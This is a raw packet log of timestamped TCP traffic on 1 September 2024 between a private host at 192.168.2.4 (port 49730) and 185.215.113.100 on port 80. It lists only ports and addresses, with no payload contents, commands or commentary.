Sep 1, 2024 23:03:02.685206890 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.685364962 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.685364962 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.135831118 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.135842085 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.136037111 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.220365047 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.220417023 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.220537901 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.220537901 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.315814972 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.315880060 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.315890074 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.315982103 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.315982103 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.315994978 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.316039085 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.316059113 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.316067934 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.316107035 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.333264112 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.333312988 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.333323956 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.333425045 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.333425045 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.724209070 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724222898 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724241972 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724335909 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724348068 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724406004 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.724406004 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.724406958 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.724450111 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724459887 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724500895 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.724519968 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.724678040 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724725008 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724726915 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.724736929 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724767923 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.724781990 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.724812984 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724824905 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724836111 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724848986 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:03.724860907 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:03.724890947 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:04.554652929 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:04.554675102 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:04.554719925 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:04.554750919 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.087737083 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.087838888 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.087872982 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.087927103 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.449228048 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.449239969 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.449290037 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.531938076 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.531946898 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.532040119 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.638504982 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.638655901 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.638667107 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.638691902 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.638765097 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.638793945 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.638806105 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.638816118 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.638859034 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.638899088 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.638941050 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.639528036 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.639575958 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.721609116 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.721788883 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.852055073 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.852113008 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.852113962 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.852144957 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.852149010 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.852183104 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.852190018 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.852204084 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:06.852227926 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:06.852241039 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.050272942 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.050311089 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.050321102 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.050409079 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.050515890 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.050586939 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.050631046 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.050659895 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.050671101 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.050699949 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.134872913 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.134890079 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.135050058 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.135050058 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.241259098 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.241277933 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.241287947 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.241317034 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.241341114 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.241508007 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.241564035 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.241595984 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.241643906 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.241667986 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.241708994 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.241714954 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.241755009 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.642671108 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.642693996 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.642704964 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.642714977 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.642726898 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.642745018 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.642795086 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.642795086 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.642950058 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.642996073 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.643054008 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.643064976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:07.643098116 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:07.643109083 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:08.457642078 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:08.457654953 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:08.457746983 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:08.649940014 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:08.650001049 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:08.650007010 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:08.650038004 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:08.735517979 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:08.735641956 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:08.735698938 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:09.313112020 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.313128948 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.313138962 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.313188076 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:09.313239098 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:09.526339054 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.526360989 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.526372910 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.526407957 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:09.526433945 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:09.716228962 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.716257095 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.716272116 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.716279030 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:09.716291904 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:09.716311932 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:09.923827887 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.923840046 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.923856020 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.923882008 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:09.923885107 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.923898935 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:09.923907995 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:09.923921108 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:09.924031973 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.007266045 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.007376909 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.007450104 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.136038065 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.136089087 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.136100054 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.136141062 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.136151075 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.136166096 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.136179924 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.136306047 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.339198112 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.339360952 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.339370966 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.339437008 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.339473963 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.339483976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.339498997 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.339498997 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.339533091 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.339533091 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.539346933 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.539359093 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.539432049 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.539469004 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.539494991 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.539521933 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.539634943 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.539650917 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.539658070 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.539690018 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.539690018 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.539877892 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.539887905 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.541357994 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.740621090 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.740641117 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.740652084 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.740672112 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.740695953 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.740809917 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.740849972 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.740873098 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.740883112 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.740922928 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.741235971 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.741274118 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.741280079 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.741285086 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.741307020 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.741323948 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.949810982 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.949824095 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.949976921 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.949978113 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.950179100 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.950226068 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.950232983 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.950244904 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.950270891 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.950282097 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.950294018 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.950331926 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:10.950531960 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.950548887 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.950558901 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:10.950691938 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.163127899 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.163156986 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.163167000 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.163300037 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.163320065 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.163320065 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.163336992 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.163387060 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.163398981 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.163429022 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.163440943 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.163777113 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.163786888 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.163824081 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.364588022 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.364609957 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.364619970 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.364633083 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.364651918 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.364733934 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.364772081 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.364811897 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.364828110 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.364850044 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.364866972 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.364871025 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.364907026 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:11.447278976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.447289944 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:11.447371960 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:12.402364969 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:12.402374029 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:12.402439117 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:12.861247063 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:12.861260891 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:12.861354113 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:12.944067955 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:12.944078922 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:12.944128990 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.069981098 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.069993973 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.070056915 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.070075035 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.070247889 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.070256948 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.070298910 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.070353031 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.070362091 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.070398092 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.152499914 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.152510881 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.152682066 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.264059067 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.264070988 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.264267921 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.264276028 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.264281034 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.264292955 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.264306068 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.264319897 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.264342070 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.264836073 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.264861107 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.264874935 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.264905930 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.265005112 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.265016079 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.265041113 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.265055895 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.346693993 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.346704006 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.346868992 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.470019102 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.470027924 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.470156908 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.470380068 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.470427990 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.470444918 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.470455885 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.470489025 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.470518112 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.470551014 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:13.553193092 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.553205967 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:13.553252935 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:14.280772924 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.280797958 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.280966043 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:14.475959063 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.476109028 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.476134062 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:14.476155043 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:14.558507919 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.558573961 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:14.558670044 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.558718920 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:14.669564962 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.669595003 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.669605970 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.669647932 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:14.669680119 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.669681072 CEST	49730	80	192.168.2.4	185.215.113.100
